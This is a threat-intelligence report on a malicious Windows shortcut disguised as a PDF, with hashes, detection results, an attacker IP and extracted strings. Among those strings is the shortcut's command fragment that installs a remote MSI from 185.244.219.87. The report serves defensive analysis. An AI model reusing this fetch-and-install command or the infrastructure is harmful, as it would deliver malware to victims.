DigitalSide Threat Intel

Doc.pdf.lnk

First submission 2024-10-14 12:32:01

File details

File type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=221, Archive, ctime=Sat May 7 06:57:07 2022, mtime=Mon Jul 1 16:32:04 2024, atime=Sat May 7 06:57:07 2022, length=218112, window=hidenormalshowminimized
Mime type: application/octet-stream
File size: 1.33 KB (1367 bytes)
MD5: bf4211c054b4b39b2ff8e652ebe8bf6b
SHA1: 443a50b500fc893eb8372e5d1bb72c649bcb63be
SHA256: a52d2a4301677c597d034ca28005538628e0ee27b403726d36496d4aa5dc548a

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 3/77 VT report date: 2024-10-14 12:11:26

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://185.244.219.87/Doc.pdf.lnk VirusTotal Report 185.244.219.87 VirusTotal Report 2024-10-14 12:32:02

Strings analysis - File found

Portable
C:\Dev\claymsi\files\MrDocument.pdf
MrDocument.pdf
Library
C:\Windows\System32&/i \\185.244.219.87@80\blog\viewer.msi"%SystemRoot%\System32\imageres.dll

Strings analysis - Possible IPs found 1

185.244.219.87